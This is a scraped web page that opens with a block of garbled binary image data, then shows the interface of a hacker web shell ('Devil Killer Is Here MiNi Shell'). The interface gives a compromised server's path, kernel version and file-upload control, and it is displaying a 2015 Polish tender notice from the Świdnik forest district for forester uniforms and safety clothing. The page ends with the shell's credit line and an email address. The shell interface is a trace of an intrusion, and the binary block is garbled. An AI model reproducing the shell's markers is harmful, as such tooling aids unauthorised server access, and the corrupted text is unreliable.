JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150427/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150427/96526-N-2015.html

<p class="kh_header"><b>Świdnik: Dostawa sortów mundurowych leśnika i sortów bhp na 2015r.</b><br>
<b>Numer ogłoszenia: 96526 - 2015; data zamieszczenia: 27.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lasy Państwowe Nadleśnictwo Świdnik , ul. Lotnicza 4, 21-040 Świdnik, woj. lubelskie, tel. 081 7513011, 7513012, faks 081 7512091.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_lublin/nadl_swidnik/zamowienia_publiczne</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sortów mundurowych leśnika i sortów bhp na 2015r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa do siedziby lub odbiór nastąpi z punktu odbioru Wykonawcy położonego w odległości do 20 km od siedziby Zamawiającego sortów mundurowych leśnika i sortów bhp wykonanych według wzorów określonych: Elementy mundurowe leśnika powinny być wykonane z tkanin i wg. wzorów określonych: Rozporządzeniem Ministra Środowiska z dnia 9 grudnia 2014r. w sprawie wzoru mundurów leśnika i oznak dla osób uprawionych do ich noszenia (Dz. U. z 2014r. poz. 1876) - do czasu opracowania jednolitej dokumentacji techniczno-technologicznej na poszczególne rodzaje mundurów i ich elementów oraz w związku z wyrażeniem zgody przez Dyrekcję Generalną Lasów Państwowych w niniejszym przetargu dopuszcza się dostawę sortów mundurowych wg wzorów obowiązujących przed wejściem w życie ww. Rozporządzenia  Zarządzeniem Nr 62 Dyrektora Generalnego Lasów Państwowych z dnia 15 lipca 2013r. w sprawie wzorca oraz zasad i norm użytkowania mundurów leśnika przez pracowników Lasów Państwowych) Zarządzeniem nr 16 Dyrektora Generalnego Lasów Państwowych z dnia 14 marca 2005r. w sprawie zmian w dokumentacji techniczno - technologicznej dla niektórych przedmiotów mundurów leśnika Zarządzenie nr 44 Dyrektora Generalnego Lasów Państwowych z dnia 14 maja 2012r. w sprawie zmian dokumentacji techniczno-technologicznej dla niektórych przedmiotów mundurów leśnika Zarządzeniem nr 54 Dyrektora Generalnego Lasów Państwowych z dnia 06 lipca 2012 r. w sprawie zmian dokumentacji techniczno-technologicznej dla niektórych przedmiotów mundurów leśnika.Sorty bhp obejmują środki ochrony indywidualnej odzież ochronną i obuwie bhp. Sorty bhp winny być zgodne z:Rozporządzeniem Ministra Gospodarki z dnia 21 grudnia 2005r. w sprawie zasadniczych wymagań dla środków ochrony indywidualnej (Dz.U. nr 259 poz.2087 z późn. zm.)Protokołem dodatkowym nr 24 do Ponadzakładowego Układu Zbiorowego Pracy dla Pracowników Państwowego Gospodarstwa Leśnego Lasy Państwowe  zawartego dnia 29 stycznia 1998r. i wpisanego do rejestru Ponadzakładowych Układów Zbiorowych Pracy pod numerem U-XLIII zawartym dnia 25 listopada 2014r.Marynarka męska i damska - gabardyna lub tropik 6 szt. Spodnie męskie i damskie - gabardyna lub tropik 18 szt. Marynarka męska i damska - gabardyna z wykończeniem oleofobowym 2 szt. Spodnie męska i damska - gabardyna z wykończeniem oleofobowym 8 szt. Spódnica - gabardyna lub tropik 5 szt. Spódnica - gabardyna z wykończeniem oleofobowym 3 szt. Koszula męska biała krótki rękaw 6 szt. Koszula męska biała długi rękaw 6 szt.Bluzka damska biała krótki rękaw 5 szt. Bluzka damska biała długi rękaw 2 szt. Koszula męska biała długi rękaw bawełna 100 % 9 szt. Koszula męska biała krótki rękaw bawełna 100 % 3 szt. Bluzka damska biała długi rękaw bawełna 100 % 1 szt. Bluzka damska biała krótki rękaw bawełna 100 % 1 szt. Krawat 6 szt. Czapka mundurowa 3 szt. Płaszcz męski 0 szt. Płaszcz damski 3 szt. Kapelusz damski lub męski 1 szt. Kurtka męska zimowa 11 szt. Kurtka damska zimowa 2 szt. Szalik 3 szt. Rękawice damskie lub męskie  9 szt. Skarpety letnie termoaktywne 37  szt. Skarpety przejściowe termoaktywne 26 szt. Skarpety zimowe termoaktywne 27 szt. Półbuty męskie, damskie wyjściowe 12  szt. Koszula męska codzienna z długim rękawem 14 szt. Koszula męska codzienna z krótkim rękawem 12 szt. Bluzka damska codzienna z długim rękawem 2 szt. Bluzka damska codzienna z krótkim rękawem 3 szt. Koszula męska codzienna z długim rękawem bawełna 100 % 16 szt. Koszula męska codzienna z krótkim rękawem bawełna 100 % 12 szt. Bluzka damska codzienna z długim rękawem bawełna 100 % 2  szt. Bluzka damska codzienna z krótkim rękawem bawełna 100 % 1 szt. Sweter (nowy wzór) 25 szt. Kamizelka 13 szt.Bluzka z polaru typu windstoper 19 szt. Kurtka wierzchnia codzienna 10 szt. Czapka zimowa 6 szt. Peleryna 1 szt. Półbuty typu Sympatex codzienne 13 szt. Półbuty typu Gore-tex codzienne 11 szt. Bluza z kamizelką letnią 7 szt. Spodnie letnie terenowe 16 szt. Czapka letnia 5 szt. Kurtka zimowa 8 szt. Spodnie zimowe terenowe 9 szt. Czapka zimowa 1 szt. Trzewiki typu Sympatex terenowe 4 szt. Trzewiki typu Gore-tex niskie terenowe 10 szt. Trzewiki typu Gore-tex wysokie 5 szt. Trzewiki typu Sympatex z ocieleniem typu Thinsulate 2 szt. Trzewiki typu Gore-tex niskie z ocieleniem typu Thinsuale 4 szt. Trzewiki typu Gore-tex wysokie z ociepleniem typu Thinsuale 3 szt. Oznaki służbowe wyhaftowane bajorkiem 3 szt. Ubranie letnie ( w tym 2 pary spodni) - kpl.  21 szt. Ubranie ocieplane tkanina z membraną oddychającą 21 szt. Koszula robocza, długi rękaw 21 szt. Koszulka krótki rękaw t -shirt 23 szt. Koszulka termoaktywna długi rękaw 23 szt. Koszulka termoaktywna, krótki rękaw 25 szt. Kalesony męskie termoaktywne/ Legginsy damskie termoaktywne 25 szt. Buty terenowe wodoodporne z membraną oddychającą 32 szt. Skarpety letnie termoaktywne 57 szt. Skarpety zimowe termoaktywne  57 szt. Czapka letnia 22 szt. Okulary przeciwsłoneczne (polaryzacyjne) 30 szt. Torba brezentowa 9 szt. Kamizelka ostrzegawcza 29 szt. ubranie całoroczne tkanina z membraną oddychającą  2 szt. Kurtka i spodnie przeciw deszczowe 11 szt. Chełm ochronny 2  szt. Ubranie letnie w kolorze ostrzegawczym 2 szt. Ubranie ocieplane w kolorze ostrzegawczym 2 szt. Kurtka przeciwdeszczowe w kolorze ostrzegawczym 2 szt. Koszula robocza długi rękaw (flanelowa) / Kamizelka ocieplająca 4 szt. Buty ochronne podnosek ochronny 2 szt. Buty (gumowe) wodoodporne podnosek ochronny 2 szt. Buty (gumowe) wodoodpormne i ciepłochronne podnosek ochronny 2 szt. Rękawice robocze 2 szt. Ubranie letnie 2 szt. Fartuch roboczy	2 szt. Rękawice ochronne 2 szt. Trzewiki 2 szt. Ubranie letnie ( w tym 2 pary spodni) kpl. 21 szt. Ubranie ocieplane tkanina z membraną oddychającą 21 szt..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 18.00.00.00-9, 18.10.00.00-0, 18.11.00.00-3, 18.14.00.00-2, 18.20.00.00-1, 18.22.00.00-7, 18.22.22.00-3, 18.33.00.00-1, 18.42.30.00-0, 14.42.40.00-7, 18.44.00.00-5, 18.80.00.00-7, 18.81.50.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta powinna być zabezpieczona wadium o wartości 2600 zł (słownie: dwa tysiące sześć set zł 00/100gr). Wadium może być wniesione w następujących formach: 1) pieniądzu; 2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że to poręczenie kasy jest zawsze poręczeniem pieniężnym; 3) gwarancjach bankowych; 4) gwarancjach ubezpieczeniowych; 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. nr 42, poz. 275, z 2008r. nr 116, poz. 730 i 732, nr 227, poz. 1505 oraz z 2010r. nr 96, poz.620). Wadium w formie pieniężnej należy wpłacić przelewem na rachunek bankowy Zamawiającego nr. 21 2030 0045 1110 0000 0050 4030 Za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku bankowym Zamawiającego. Dowód potwierdzający wpłatę (wniesienie) wadium należy dołączyć do oferty. Wadium wniesione 
w pozostałych formach, należy w oryginale złożyć w pokoju nr 6 (kasa) w siedzibie Zamawiającego zaś kopię dołączyć do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań, co do tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Miarą spełnienia warunku przez Wykonawcę będzie wykonanie w okresie ostatnich trzech lat od daty upływu terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
co najmniej dwóch dostaw odpowiadających swoim rodzajem (dostawy umundurowania dla jednostek Lasów Państwowych, wojska, policji, Straży Pożarnej lub innych służb mundurowych) i odpowiadające wartością przedmiotowi zamówienia (nie mniej niż 70 tys. zł każda), odpowiednio potwierdzone, 
że zostały wykonane należycie. W przypadku oferty wspólnej spełnienie tego warunku będzie oceniane łącznie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań, co do tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań, co do tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań, co do tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji - 5</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_lublin/nadl_swidnik/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Lasy Państwowe Nadleśnictwo Świdnik 21-040 Świdnik ul. Lotnicza 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2015 godzina 10:00, miejsce: Lasy Państwowe Nadleśnictwo Świdnik 21-040 Świdnik ul. Lotnicza 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Termin wykonania zamówienia sukcesywnie wg potrzeb Zamawiającego od dnia podpisania mowy do 31.12.2015r. 
2. Wszystkie postanowienia zawiera wzór umowy stanowiący załącznik nr 6 do s.i.w.z. 
3. Umowa pod rygorem nieważności wymaga zachowania formy pisemnej. 
4.Zamawiający zastrzega sobie, że każdorazowo przy dostawie cząstkowego zamówienia wykonawca ma obowiązek na żądanie Zamawiającego przedłożyć kopię świadectwa oceny zgodności elementów mundurowych ze wzorem munduru leśnika, wydanego przez ORW LP w Bedoniu, jako dokument niezbędny do dokonania dostawy.
5. Zamawiający zastrzega sobie prawo zmiany ilościowej poszczególnych elementów umundurowania leśnika, przy zachowaniu ilości punktów oraz do wprowadzania zmian korzystnych dla zamawiającego, których na dzień ogłoszenia przetargu nie przewidział, a dotyczących każdego jej postanowienia, tj. takich zmian, które nie wpłynęłyby na krąg podmiotów ubiegających się o zamówienie publiczne bądź na wynik samego postępowania o to zamówienie.
6. Postanowienia projektu umowy nie podlegają negocjacjom i nie mogą być zmienione lub uzupełnione..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com